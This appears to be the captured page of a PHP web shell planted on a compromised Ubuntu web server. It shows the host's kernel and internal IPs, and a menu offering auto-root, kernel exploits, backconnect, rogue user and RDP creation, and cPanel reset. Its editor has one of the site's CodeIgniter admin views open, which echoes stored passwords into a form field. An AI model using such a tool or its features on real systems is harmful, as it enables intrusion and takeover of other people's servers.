Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
admin /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
ablog-content.php
15.55
KB
-rwxr-x--x
ablog-list.php
4.11
KB
-rwxr-x--x
ablog.php
9.8
KB
-rwxr-x--x
cat-content.php
14.67
KB
-rwxr-x--x
cat-list.php
4.41
KB
-rwxr-x--x
cat.php
11.79
KB
-rwxr-x--x
corse-content.php
24.91
KB
-rwxr-x--x
corse-list.php
5.01
KB
-rwxr-x--x
corse.php
11.97
KB
-rwxr-x--x
dashboard-content.php
7.49
KB
-rwxr-x--x
dashboard.php
4.9
KB
-rwxr-x--x
evnt-content.php
22.8
KB
-rwxr-x--x
evnt-list.php
5.78
KB
-rwxr-x--x
evnt.php
13.14
KB
-rwxr-x--x
item-content.php
29.69
KB
-rwxr-x--x
item-list.php
5.48
KB
-rwxr-x--x
item.php
14.06
KB
-rwxr-x--x
jobc-content.php
24.4
KB
-rwxr-x--x
jobc-list.php
5
KB
-rwxr-x--x
jobc.php
11.97
KB
-rwxr-x--x
mdc-content.php
14.59
KB
-rwxr-x--x
mdc-list.php
5.61
KB
-rwxr-x--x
mdc.php
10.77
KB
-rwxr-x--x
mems-content.php
16.55
KB
-rwxr-x--x
mems-list.php
4.44
KB
-rwxr-x--x
mems.php
10.73
KB
-rwxr-x--x
pages-content.php
11.04
KB
-rwxr-x--x
pages-list.php
2.57
KB
-rwxr-x--x
pages.php
10.41
KB
-rwxr-x--x
proj-content.php
24.42
KB
-rwxr-x--x
proj-list.php
5.85
KB
-rwxr-x--x
proj.php
12.63
KB
-rwxr-x--x
projt-content.php
5.66
KB
-rwxr-x--x
projt-list.php
3.84
KB
-rwxr-x--x
projt.php
8.67
KB
-rwxr-x--x
puba-content.php
5.66
KB
-rwxr-x--x
puba-list.php
3.87
KB
-rwxr-x--x
puba.php
8.67
KB
-rwxr-x--x
publ-content.php
27.35
KB
-rwxr-x--x
publ-list.php
6.23
KB
-rwxr-x--x
publ.php
12.66
KB
-rwxr-x--x
pubv-content.php
5.66
KB
-rwxr-x--x
pubv-list.php
3.87
KB
-rwxr-x--x
pubv.php
8.67
KB
-rwxr-x--x
udig-content.php
5.62
KB
-rwxr-x--x
udig-list.php
3.59
KB
-rwxr-x--x
udig.php
8.67
KB
-rwxr-x--x
user-content.php
32.34
KB
-rwxr-x--x
user-list.php
5.77
KB
-rwxr-x--x
user.php
13.49
KB
-rwxr-x--x
wrks-content.php
24.38
KB
-rwxr-x--x
wrks-list.php
5
KB
-rwxr-x--x
wrks.php
11.84
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user-content.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); if($PRSNT_BLK ==BLK_LIST){ ?> <div class="row"> <div class="col-md-12"> <section class="panel"> <header class="panel-heading" style="border-bottom:2px solid #00a65a;"> <a href="<?php echo site_url($URL['ADD_URL']);?>" class="btn btn-success" style="float:right; margin-right:5px;"><?=$this->lang->line('BTN_ADD');?></a> <span class="blueGrey"> </span> </header> <?php if(count($rdList) > 0){ ?> <div class="panel-body" style="border-bottom:2px solid #00a65a;"> <div class="row formRow"> <div class="col-sm-2"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UTYPE_');?><span class="headRed">*</span></label> <select name="TypeId" id="TypeId" required class="form-control"> <option value=""><?=$this->lang->line('_SLCT_');?></option> <option value="1"><?=$this->lang->line('_FCLTY_');?></option> <option value="2"><?=$this->lang->line('_STAF_');?></option> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UDESG_');?><span class="headRed">*</span></label> <select name="DigId" id="DigId" class="form-control" required> <option value=""><?=$this->lang->line('_SLCT_');?></option> <?php foreach($catList as $key=>$cat) { echo '<option value="'.$cat['Id'].'">'.$cat['NAME'].'</option>'; } ?> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_FNAME_');?></label> <input type="text" class="form-control" name="SrchKey" id="SrchKey" value="" placeholder="Search <?=$this->lang->line('_FNAME_');?>..." /> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_LNAME_');?></label> <input type="text" class="form-control" name="SrchlKey" id="SrchlKey" value="" placeholder="Search <?=$this->lang->line('_LNAME_');?>..." /> </div> </div> <div class="col-sm-1"> <div class="form-group"><br/> <button type="button" class="btn btn-block btn-success reset_btn" id="SearchId"><?=$this->lang->line('BTN_FLTR');?></button> </div> </div> </div> </div> <?php } ?> <input type="hidden" name="sortName" id="sortName" value="<?=$SORT_NAME;?>"/> <input type="hidden" name="sortBy" id="sortBy" value="<?=$SORT_TYPE;?>"/> <div class="panel-body" id="RecordList"><?=$cList;?></div> <div class="loading" style="display:none;" id="srchLoading"> <div class="content"><img src="<?=$this->config->item('img_url');?>loader.gif"/></div> </div> <div style="text-align:center;display:none;" id="srchingMsg" class="headRed"></div> </section> </div> </div> <?php }elseif($PRSNT_BLK ==BLK_PAGE){ ?> <?=$cList;?> <?php }elseif($PRSNT_BLK ==BLK_ADD){ ?> <form id="signupForm" action="<?php echo site_url($URL['ADD_NEW']); ?>" method="post" enctype="multipart/form-data"> <input type="hidden" name="Id" id="Id" value="<?=$Id;?>"/> <div class="row"> <div class="col-md-12"> <section class="panel"> <div class="panel-body"> <h5 class="headRed"><?=validation_errors(); ?></h5> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_FNAME_');?><span class="headRed">*</span></label> <input type="text" class="form-control charonly input-char-count" name="FName" id="FName" value="<?=set_value('FName');?>" placeholder="<?=$this->lang->line('_FNAME_');?>" maxlength="<?=LN_20;?>" required autofocus/> <span id="error_fld1" class="headRed"></span> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_LNAME_');?><span class="headRed">*</span></label> <input type="text" class="form-control charonly input-char-count" name="LName" id="LName" value="<?=set_value('LName');?>" placeholder="<?=$this->lang->line('_LNAME_');?>" maxlength="<?=LN_20;?>" required/> <span id="error_fld1" class="headRed"></span> </div> </div> </div> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_MOB_');?><span class="headRed">*</span></label> <input type="text" class="form-control CheckNum" name="Mob" id="Mob" value="<?=set_value('Mob');?>" placeholder="<?=$this->lang->line('_MOB_');?>" maxlength="10" required/> <span id="error_fld1" class="headRed"></span> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_EMAIL_');?><span class="headRed">*</span></label> <input type="email" class="form-control input-char-count" name="Email" id="Email" value="<?=set_value('Email');?>" placeholder="<?=$this->lang->line('_EMAIL_');?>" maxlength="75" required/> <span id="error_fld1" class="headRed"></span> </div> </div> </div> <div class="row formRow"> <div class="col-sm-12"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UWRK_');?></label> <input type="text" class="form-control input-char-count" name="wrk" id="wrk" value="<?=set_value('wrk');?>" placeholder="<?=$this->lang->line('_UWRK_');?>" maxlength="155" /> </div> </div> </div> <div class="row formRow"> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UTYPE_');?><span class="headRed">*</span></label> <select name="TypeId" id="TypeId" required class="form-control"> <option value=""><?=$this->lang->line('_SLCT_');?></option> <option value="1"><?=$this->lang->line('_FCLTY_');?></option> <option value="2"><?=$this->lang->line('_STAF_');?></option> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UDESG_');?><span class="headRed">*</span></label> <select name="DigId" id="DigId" class="form-control" required> <option value=""><?=$this->lang->line('_SLCT_');?></option> <?php foreach($catList as $key=>$cat) { echo '<option value="'.$cat['Id'].'">'.$cat['NAME'].'</option>'; } ?> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_ATCH_');?></label> <input type="text" class="form-control prjd" name="prjd" id="prjd" value="<?=set_value('dprc');?>" placeholder="<?=$this->lang->line('_ATCH_');?>" readonly/> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('GL_STATUS');?></label> <div class="col-md-12"> <div class="input-group"> <input type="radio" name="Status" id="Status_A" value="<?=STATUS_A;?>" <?=set_radio('Status', ''.STATUS_A.'', TRUE);?>/><?=$this->lang->line('GL_ACTIVE');?> <input type="radio" name="Status" id="Status_I" value="<?=STATUS_I;?>" <?=set_radio('Status', ''.STATUS_I.'');?>/><?=$this->lang->line('GL_INACTIVE');?> </div> </div> </div> </div> </div> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label">linkedin Url</label> <input type="text" class="form-control" name="surl" id="surl" value="<?=set_value('surl');?>" placeholder="linkedin Url" /> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_LGN_');?><span class="headRed">*</span></label> <input type="text" class="form-control input-char-count" name="username" id="username" value="<?=set_value('username');?>" placeholder="<?=$this->lang->line('_LGN_');?>" maxlength="15" required/> <span id="error_fld1" class="headRed"></span> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_PWD_');?><span class="headRed">*</span></label> <input type="password" class="form-control input-char-count" name="Pwd" id="Pwd" value="<?=set_value('Pwd');?>" placeholder="<?=$this->lang->line('_LNAME_');?>" maxlength="15" required/> <span id="error_fld1" class="headRed"></span> </div> </div> </div> <div class="row formRow"> <div class="col-sm-12"> <div class="form-group"> <label class="control-label">Short Description</label> <textarea class="form-control" name="ldesc" id="ldesc" value="<?=set_value('ldesc');?>" required></textarea> </div> </div> </div> </div> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label">Upload Image(<?=HW180;?> X <?=HW210;?>)<span class="headRed">*</span></label> <div class="col-md-12"> <div class="fileupload fileupload-new" data-provides="fileupload"> <div class="input-append"> <div class="uneditable-input"> <i class="fa fa-file fileupload-exists"></i> <span class="fileupload-preview"></span> </div> <span class="btn btn-default btn-file"> <span class="fileupload-exists">Change</span> <span class="fileupload-new">Select file</span> <input type="file" name="prPic" id="prPic" multiple accept="image/*" /> </span> <a href="#" class="btn btn-default fileupload-exists" data-dismiss="fileupload">Remove</a> </div> </div> </div> <div class="form-group"><img id="PreviewPic" src="#" alt="your image" width="<?=$B_WDTH;?>" height="<?=$B_HGHT;?>" /></div> </div> </div> </div> <footer class="panel-footer"> <button class="btn btn-primary" type="submit"><?=$this->lang->line('BTN_SUBMIT');?></button> <a id="backId" class="btn btn-default"><?=$this->lang->line('BTN_CANCEL');?></a> </footer> </section> </div> </div> </form> <?php }elseif($PRSNT_BLK ==BLK_UPDATE){ $ImgShow='#';$B_WDTH='';$B_HGHT=''; if($Dtls['PRPIC']!=''){$ImgShow=base_url().DIR_USR.'/'.DIR_STN.'/'.$Dtls['PRPIC'];$B_WDTH='410';$B_HGHT='230';} ?> <form id="signupForm" action="<?=site_url($PAGE_CL.'/'.MTHD_UPDATED);?>" method="post" enctype="multipart/form-data"> <input type="hidden" name="Id" id="Id" value="<?=$Id;?>"/> <input type="hidden" name="oldPic" id="oldPic" value="<?=$Dtls['PRPIC'];?>"/> <div class="row"> <div class="col-md-12"> <section class="panel"> <div class="panel-body"> <h5 class="headRed"><?=validation_errors(); ?></h5> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_FNAME_');?><span class="headRed">*</span></label> <input type="text" class="form-control charonly input-char-count" name="FName" id="FName" value="<?=set_value('FName',$Dtls['FNAME']);?>" placeholder="<?=$this->lang->line('_FNAME_');?>" maxlength="<?=LN_20;?>" required autofocus/> <span id="error_fld1" class="headRed"></span> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_LNAME_');?><span class="headRed">*</span></label> <input type="text" class="form-control charonly input-char-count" name="LName" id="LName" value="<?=set_value('LName',$Dtls['LNAME']);?>" placeholder="<?=$this->lang->line('_LNAME_');?>" maxlength="<?=LN_20;?>" required/> <span id="error_fld1" class="headRed"></span> </div> </div> </div> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_MOB_');?><span class="headRed">*</span></label> <input type="text" class="form-control CheckNum" name="Mob" id="Mob" value="<?=set_value('Mob',$Dtls['MOBILE']);?>" placeholder="<?=$this->lang->line('_MOB_');?>" maxlength="10" required/> <span id="error_fld1" class="headRed"></span> </div> </div> <div class="col-sm-6"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_EMAIL_');?><span class="headRed">*</span></label> <input type="email" class="form-control input-char-count" name="Email" id="Email" value="<?=set_value('Email',$Dtls['EMAIL']);?>" placeholder="<?=$this->lang->line('_EMAIL_');?>" maxlength="75" required/> <span id="error_fld1" class="headRed"></span> </div> </div> </div> <div class="row formRow"> <div class="col-sm-12"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UWRK_');?></label> <input type="text" class="form-control input-char-count" name="wrk" id="wrk" value="<?=set_value('wrk',$Dtls['WRKAR']);?>" placeholder="<?=$this->lang->line('_UWRK_');?>" maxlength="155" /> </div> </div> </div> <div class="row formRow"> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UTYPE_');?><span class="headRed">*</span></label> <select name="TypeId" id="TypeId" required class="form-control"> <option value=""><?=$this->lang->line('_SLCT_');?></option> <option value="1" <?=($Dtls['TYPID']==1)?'selected':''?>><?=$this->lang->line('_FCLTY_');?></option> <option value="2" <?=($Dtls['TYPID']==2)?'selected':''?>><?=$this->lang->line('_STAF_');?></option> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_UDESG_');?><span class="headRed">*</span></label> <select name="DigId" id="DigId" class="form-control" required> <option value=""><?=$this->lang->line('_SLCT_');?></option> <?php foreach($catList as $key=>$cat) { if($cat['Id']==$Dtls['DIGID'])$ctSlt='selected';else $ctSlt=''; echo '<option value="'.$cat['Id'].'" '.$ctSlt.'>'.$cat['NAME'].'</option>'; } ?> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_ATCH_');?></label> <input type="text" class="form-control prjd" name="prjd" id="prjd" value="<?=set_value('dprc',$Dtls['JOIND']);?>" placeholder="<?=$this->lang->line('_ATCH_');?>" readonly/> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('GL_STATUS');?></label> <div class="col-md-12"> <div class="input-group"> <input type="radio" name="Status" id="Status_A" value="<?=STATUS_A;?>" <?=($Dtls['STATUS']==STATUS_A)?'checked':''?>/><?=$this->lang->line('GL_ACTIVE');?> <input type="radio" name="Status" id="Status_I" value="<?=STATUS_I;?>" <?=($Dtls['STATUS']==STATUS_I)?'checked':''?>/><?=$this->lang->line('GL_INACTIVE');?> </div> </div> </div> </div> </div> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label">linkedin Url</label> <input type="text" class="form-control" name="surl" id="surl" value="<?=set_value('surl',$Dtls['SURL']);?>" placeholder="linkedin Url" /> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_LGN_');?><span class="headRed">*</span></label> <input type="text" class="form-control input-char-count" name="username" id="username" value="<?=set_value('username',$Dtls['USERNAME']);?>" placeholder="<?=$this->lang->line('_LGN_');?>" maxlength="15" required/> <span id="error_fld1" class="headRed"></span> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label class="control-label"><?=$this->lang->line('_PWD_');?><span class="headRed">*</span></label> <input type="password" class="form-control input-char-count" name="Pwd" id="Pwd" value="<?=set_value('Pwd',$Dtls['USERPASS']);?>" placeholder="<?=$this->lang->line('_LNAME_');?>" maxlength="15" required/> <span id="error_fld1" class="headRed"></span> </div> </div> </div> <div class="row formRow"> <div class="col-sm-12"> <div class="form-group"> <label class="control-label">Short Description</label> <textarea class="form-control" name="ldesc" id="ldesc" required><?=$Dtls['SBIO'];?></textarea> </div> </div> </div> </div> <div class="row formRow"> <div class="col-sm-6"> <div class="form-group"> <label class="control-label">Upload Image(<?=HW180;?> X <?=HW210;?>)<span class="headRed">*</span></label> <div class="col-md-12"> <div class="fileupload fileupload-new" data-provides="fileupload"> <div class="input-append"> <div class="uneditable-input"> <i class="fa fa-file fileupload-exists"></i> <span class="fileupload-preview"></span> </div> <span class="btn btn-default btn-file"> <span class="fileupload-exists">Change</span> <span class="fileupload-new">Select file</span> <input type="file" name="prPic" id="prPic" multiple accept="image/*" /> </span> <a href="#" class="btn btn-default fileupload-exists" data-dismiss="fileupload">Remove</a> </div> </div> </div> <div class="form-group"><img id="PreviewPic" src="<?=$ImgShow;?>" alt="your image" width="<?=$B_WDTH;?>" height="<?=$B_HGHT;?>" /></div> </div> </div> </div> <footer class="panel-footer"> <button class="btn btn-primary" type="submit"><?=$this->lang->line('BTN_SUBMIT');?></button> <a id="backId" class="btn btn-default"><?=$this->lang->line('BTN_CANCEL');?></a> </footer> </section> </div> </div> </form> <?php }elseif($PRSNT_BLK ==BLK_2ND_LIST){ ?> <form id="signupForm" action="<?php echo site_url($PAGE_CL.'/'.MTHD_ONE_NEW);?>" method="post" enctype="multipart/form-data"> <input type="hidden" name="Id" id="Id" value="<?=$Id;?>"/> <div class="row"> <div class="col-md-12"> <section class="panel"> <div class="panel-body"> <h5 class="headRed"><?=validation_errors(); ?></h5> <div class="row formRow"> <div class="col-sm-12"> <div class="form-group"> <table class="table table-bordered table-striped mb-none"> <thead> <tr class="gradeX" style="background-color:<?=A_COLOR;?>;"> <th style="background-color:#191C21;text-align:left; color:#FFF; font-weight:bold;"><?=$this->lang->line('GL_MODULE');?></th> <th style="text-align:center;background-color:<?=I_COLOR;?>;"><?=$this->lang->line('GL_ADD');?></th> <th style="text-align:center;background-color:<?=I_COLOR;?>;"><?=$this->lang->line('GL_EDT');?></th> <th style="text-align:center;background-color:<?=I_COLOR;?>;"><?=$this->lang->line('GL_DEL');?></th> <th style="text-align:center;background-color:<?=I_COLOR;?>;"><?=$this->lang->line('GL_VEW');?></th> </tr> </thead> <tbody> <?php foreach($mist as $key =>$Row) { ?> <tr> <td style="background-color:#191C21;text-align:left; color:#FFF; font-weight:bold;"><?=$Row['NAME'];?></td> <?php $ChkAr ="";$ChkEr ="";$ChkVr =""; $ChkDr="";$ChkWr=""; $AcsChk=""; $acsId=NUM_ZERO; $AcsChk = $Row['AcsChk']; if(count($AcsChk) > 0 && $AcsChk['AD']==NUM_ONE) $ChkAr ="checked"; if(count($AcsChk) > 0 && $AcsChk['ED']==NUM_ONE) $ChkEr ="checked"; if(count($AcsChk) > 0 && $AcsChk['VW']==NUM_ONE) $ChkVr ="checked"; if(count($AcsChk) > 0 && $AcsChk['DL']==NUM_ONE) $ChkDr ="checked"; if(count($AcsChk) > 0 && $AcsChk['Id'] > NUM_ZERO) $acsId =$AcsChk['Id']; ?> <input type="hidden" name="mdlId[<?=$Row['Id'];?>]" id="mdl_<?=$Row['Id'];?>" value="<?=$Row['Id'];?>"/> <input type="hidden" name="acsId[<?=$Row['Id'];?>]" id="acsId_<?=$Row['Id'];?>" value="<?=$acsId;?>"/> <td style="text-align:center;background-color:<?=I_COLOR;?>;"> <?php if(count($Row['chldList']) <= 0){?><input type="checkbox" name="add[<?=$Row['Id'];?>]" id="add_<?=$Row['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkAr;?>/><?php } ?></td> <td style="text-align:center;background-color:<?=I_COLOR;?>;"><?php if(count($Row['chldList']) <= 0){?><input type="checkbox" name="edit[<?=$Row['Id'];?>]" id="edit_<?=$Row['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkEr;?>/><?php } ?></td> </td> <td style="text-align:center;background-color:<?=I_COLOR;?>;"><?php if(count($Row['chldList']) <= 0){?><input type="checkbox" name="delt[<?=$Row['Id'];?>]" id="delt_<?=$Row['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkDr;?>/><?php } ?></td> <td style="text-align:center;background-color:<?=I_COLOR;?>;"><?php if(count($Row['chldList']) <= 0){?><input type="checkbox" name="view[<?=$Row['Id'];?>]" id="view_<?=$Row['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkVr;?>/><?php } ?></td> </tr> <?php if(count($Row['chldList']) > 0) { foreach($Row['chldList'] as $key =>$cRow) { ?> <tr> <td style="background-color:#191C21;text-align:left; color:#FFF; font-weight:bold; padding-left:65px;">>> <?=$cRow['NAME'];?></td> <?php $ChkAr ="";$ChkEr ="";$ChkVr =""; $ChkDr="";$ChkWr=""; $AcsChk=""; $acsId=NUM_ZERO; $AcsChk = $cRow['AcsChk']; if(count($AcsChk) > 0 && $AcsChk['AD']==NUM_ONE) $ChkAr ="checked"; if(count($AcsChk) > 0 && $AcsChk['ED']==NUM_ONE) $ChkEr ="checked"; if(count($AcsChk) > 0 && $AcsChk['VW']==NUM_ONE) $ChkVr ="checked"; if(count($AcsChk) > 0 && $AcsChk['DL']==NUM_ONE) $ChkDr ="checked"; if(count($AcsChk) > 0 && $AcsChk['Id'] > NUM_ZERO) $acsId =$AcsChk['Id']; ?> <input type="hidden" name="mdlId[<?=$cRow['Id'];?>]" id="mdl_<?=$cRow['Id'];?>" value="<?=$cRow['Id'];?>"/> <input type="hidden" name="acsId[<?=$cRow['Id'];?>]" id="acsId_<?=$cRow['Id'];?>" value="<?=$acsId;?>"/> <td style="text-align:center;background-color:<?=I_COLOR;?>;"><input type="checkbox" name="add[<?=$cRow['Id'];?>]" id="add_<?=$cRow['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkAr;?>/></td> <td style="text-align:center;background-color:<?=I_COLOR;?>;"><input type="checkbox" name="edit[<?=$cRow['Id'];?>]" id="edit_<?=$cRow['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkEr;?>/></td> </td> <td style="text-align:center;background-color:<?=I_COLOR;?>;"><input type="checkbox" name="delt[<?=$cRow['Id'];?>]" id="delt_<?=$cRow['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkDr;?>/></td> <td style="text-align:center;background-color:<?=I_COLOR;?>;"><input type="checkbox" name="view[<?=$cRow['Id'];?>]" id="view_<?=$cRow['Id'];?>" value="<?=NUM_ONE;?>" <?=$ChkVr;?>/> </tr> <?php } } } ?> </tbody> </table> </div> </div> </div> </div> <footer class="panel-footer"> <button class="btn btn-primary" type="submit"><?=$this->lang->line('BTN_SUBMIT');?></button> <a id="backId" class="btn btn-default"><?=$this->lang->line('BTN_CANCEL');?></a> </footer> </section> </div> </div> </form> <?php }else{} ?>
Close